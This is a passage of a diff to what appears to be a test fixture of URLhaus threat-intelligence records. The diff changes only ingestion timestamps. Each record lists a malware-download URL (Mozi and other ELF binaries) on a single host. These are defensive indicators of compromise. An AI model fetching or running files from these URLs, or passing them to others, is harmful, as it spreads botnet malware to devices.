"{\"id\":\"961088\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961088/\",\"url\":\"http://89.160.20.156:47120/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:19:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -22385,7 +22385,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.027872800Z", + "ingested": "2021-12-14T14:56:15.726590293Z", "original": "{\"id\":\"961089\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961089/\",\"url\":\"http://89.160.20.156:46287/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:19:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -22435,7 +22435,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.027880Z", + "ingested": "2021-12-14T14:56:15.726590662Z", "original": "{\"id\":\"961085\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961085/\",\"url\":\"http://89.160.20.156:39536/bin.sh\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:14:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"elf\",\"mips\"]}", "category": "threat", "type": "indicator", @@ -22484,7 +22484,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.027886900Z", + "ingested": "2021-12-14T14:56:15.726591192Z", "original": "{\"id\":\"961083\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961083/\",\"url\":\"http://89.160.20.156:40689/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:07:08 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -22533,7 +22533,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.027893800Z", + "ingested": "2021-12-14T14:56:15.726591617Z", "original": "{\"id\":\"961084\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961084/\",\"url\":\"http://89.160.20.156:51123/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:07:08 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -22582,7 +22582,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.027900700Z", + "ingested": "2021-12-14T14:56:15.726592163Z", "original": "{\"id\":\"961082\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961082/\",\"url\":\"http://89.160.20.156:52540/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:07:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -22631,7 +22631,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.027907600Z", + "ingested": "2021-12-14T14:56:15.726592534Z", "original": "{\"id\":\"961081\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961081/\",\"url\":\"http://89.160.20.156:56964/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:07:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -22680,7 +22680,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.027914500Z", + "ingested": "2021-12-14T14:56:15.726592898Z", "original": "{\"id\":\"961078\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961078/\",\"url\":\"http://89.160.20.156:57120/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:07:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -22729,7 +22729,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.027921400Z", + "ingested": "2021-12-14T14:56:15.726593373Z", "original": "{\"id\":\"961079\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961079/\",\"url\":\"http://89.160.20.156:44518/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:07:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -22778,7 +22778,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.027928600Z", + "ingested": "2021-12-14T14:56:15.726593741Z", "original": "{\"id\":\"961080\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961080/\",\"url\":\"http://89.160.20.156:50389/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:07:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -22827,7 +22827,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.027936600Z", + "ingested": "2021-12-14T14:56:15.726594108Z", "original": "{\"id\":\"961077\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961077/\",\"url\":\"http://89.160.20.156:34335/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:06:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -22876,7 +22876,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.027943600Z", + "ingested": "2021-12-14T14:56:15.726594522Z", "original": "{\"id\":\"961069\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961069/\",\"url\":\"http://89.160.20.156:54865/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:06:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -22925,7 +22925,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.027950600Z", + "ingested": "2021-12-14T14:56:15.726594939Z", "original": "{\"id\":\"961070\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961070/\",\"url\":\"http://89.160.20.156:50773/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:06:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -22974,7 +22974,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.027957400Z", + "ingested": "2021-12-14T14:56:15.726595405Z", "original": "{\"id\":\"961071\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961071/\",\"url\":\"http://89.160.20.156:52005/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:06:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -23023,7 +23023,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028000500Z", + "ingested": "2021-12-14T14:56:15.726595808Z", "original": "{\"id\":\"961072\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961072/\",\"url\":\"http://89.160.20.156:56066/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:06:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -23072,7 +23072,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028008900Z", + "ingested": "2021-12-14T14:56:15.726596182Z", "original": "{\"id\":\"961073\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961073/\",\"url\":\"http://89.160.20.156:32915/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:06:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -23121,7 +23121,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028016100Z", + "ingested": "2021-12-14T14:56:15.726596561Z", "original": "{\"id\":\"961074\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961074/\",\"url\":\"http://89.160.20.156:43462/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:06:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -23170,7 +23170,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028023Z", + "ingested": "2021-12-14T14:56:15.726597082Z", "original": "{\"id\":\"961075\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961075/\",\"url\":\"http://89.160.20.156:33291/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:06:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -23219,7 +23219,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028030Z", + "ingested": "2021-12-14T14:56:15.726597457Z", "original": "{\"id\":\"961076\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961076/\",\"url\":\"http://89.160.20.156:1440/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:06:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -23268,7 +23268,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028036800Z", + "ingested": "2021-12-14T14:56:15.726597996Z", "original": "{\"id\":\"961068\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961068/\",\"url\":\"http://89.160.20.156:55907/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:05:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -23317,7 +23317,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028043900Z", + "ingested": "2021-12-14T14:56:15.726598368Z", "original": "{\"id\":\"961066\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961066/\",\"url\":\"http://89.160.20.156:33181/Mozi.a\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:05:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -23366,7 +23366,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028050800Z", + "ingested": "2021-12-14T14:56:15.726598735Z", "original": "{\"id\":\"961067\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961067/\",\"url\":\"http://89.160.20.156:44691/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:05:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -23415,7 +23415,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028057700Z", + "ingested": "2021-12-14T14:56:15.726599146Z", "original": "{\"id\":\"961059\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961059/\",\"url\":\"http://89.160.20.156:55254/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:05:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -23464,7 +23464,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028065200Z", + "ingested": "2021-12-14T14:56:15.726599519Z", "original": "{\"id\":\"961060\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961060/\",\"url\":\"http://89.160.20.156:43010/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:05:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -23513,7 +23513,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028072500Z", + "ingested": "2021-12-14T14:56:15.726599891Z", "original": "{\"id\":\"961061\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961061/\",\"url\":\"http://89.160.20.156:37886/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:05:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -23562,7 +23562,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028079500Z", + "ingested": "2021-12-14T14:56:15.726600267Z", "original": "{\"id\":\"961062\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961062/\",\"url\":\"http://89.160.20.156:40153/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:05:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -23611,7 +23611,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028086400Z", + "ingested": "2021-12-14T14:56:15.726600783Z", "original": "{\"id\":\"961063\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961063/\",\"url\":\"http://89.160.20.156:34305/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:05:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -23660,7 +23660,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028093200Z", + "ingested": "2021-12-14T14:56:15.726601193Z", "original": "{\"id\":\"961064\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961064/\",\"url\":\"http://89.160.20.156:35653/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:05:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -23709,7 +23709,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028100200Z", + "ingested": "2021-12-14T14:56:15.726601556Z", "original": "{\"id\":\"961065\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961065/\",\"url\":\"http://89.160.20.156:48908/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:05:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -23758,7 +23758,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028107Z", + "ingested": "2021-12-14T14:56:15.726601914Z", "original": "{\"id\":\"961058\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961058/\",\"url\":\"http://89.160.20.156:40035/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:04:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -23807,7 +23807,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028114Z", + "ingested": "2021-12-14T14:56:15.726602283Z", "original": "{\"id\":\"961055\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961055/\",\"url\":\"http://89.160.20.156:54461/Mozi.a\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:04:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -23856,7 +23856,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028120900Z", + "ingested": "2021-12-14T14:56:15.726602758Z", "original": "{\"id\":\"961056\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961056/\",\"url\":\"http://89.160.20.156:51991/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:04:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -23905,7 +23905,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028127700Z", + "ingested": "2021-12-14T14:56:15.726603128Z", "original": "{\"id\":\"961057\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961057/\",\"url\":\"http://89.160.20.156:41143/i\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:04:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"arm\",\"elf\"]}", "category": "threat", "type": "indicator", @@ -23954,7 +23954,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028134600Z", + "ingested": "2021-12-14T14:56:15.726603493Z", "original": "{\"id\":\"961054\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961054/\",\"url\":\"http://89.160.20.156:51095/i\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:02:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"elf\",\"mips\"]}", "category": "threat", "type": "indicator", @@ -24003,7 +24003,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028141600Z", + "ingested": "2021-12-14T14:56:15.726603860Z", "original": "{\"id\":\"961053\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961053/\",\"url\":\"http://89.160.20.156:36558/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:52:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -24052,7 +24052,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028148500Z", + "ingested": "2021-12-14T14:56:15.726604307Z", "original": "{\"id\":\"961050\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961050/\",\"url\":\"http://89.160.20.156:47548/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:52:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -24101,7 +24101,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028155300Z", + "ingested": "2021-12-14T14:56:15.726604757Z", "original": "{\"id\":\"961051\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961051/\",\"url\":\"http://89.160.20.156:35796/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:52:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -24150,7 +24150,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028162300Z", + "ingested": "2021-12-14T14:56:15.726605125Z", "original": "{\"id\":\"961052\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961052/\",\"url\":\"http://89.160.20.156:42765/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:52:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -24199,7 +24199,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028169300Z", + "ingested": "2021-12-14T14:56:15.726605494Z", "original": "{\"id\":\"961048\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961048/\",\"url\":\"http://89.160.20.156:37388/Mozi.a\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:51:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -24248,7 +24248,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028176200Z", + "ingested": "2021-12-14T14:56:15.726605860Z", "original": "{\"id\":\"961049\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961049/\",\"url\":\"http://89.160.20.156:56849/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:51:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -24297,7 +24297,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028183300Z", + "ingested": "2021-12-14T14:56:15.726606354Z", "original": "{\"id\":\"961047\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961047/\",\"url\":\"http://89.160.20.156:35574/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:51:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -24346,7 +24346,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028190300Z", + "ingested": "2021-12-14T14:56:15.726606718Z", "original": "{\"id\":\"961046\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961046/\",\"url\":\"http://89.160.20.156:46947/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:50:08 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -24395,7 +24395,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028197600Z", + "ingested": "2021-12-14T14:56:15.726607084Z", "original": "{\"id\":\"961043\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961043/\",\"url\":\"http://89.160.20.156:34452/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:50:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -24444,7 +24444,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028205200Z", + "ingested": "2021-12-14T14:56:15.726607454Z", "original": "{\"id\":\"961044\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961044/\",\"url\":\"http://89.160.20.156:33017/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:50:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -24493,7 +24493,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028212200Z", + "ingested": "2021-12-14T14:56:15.726607920Z", "original": 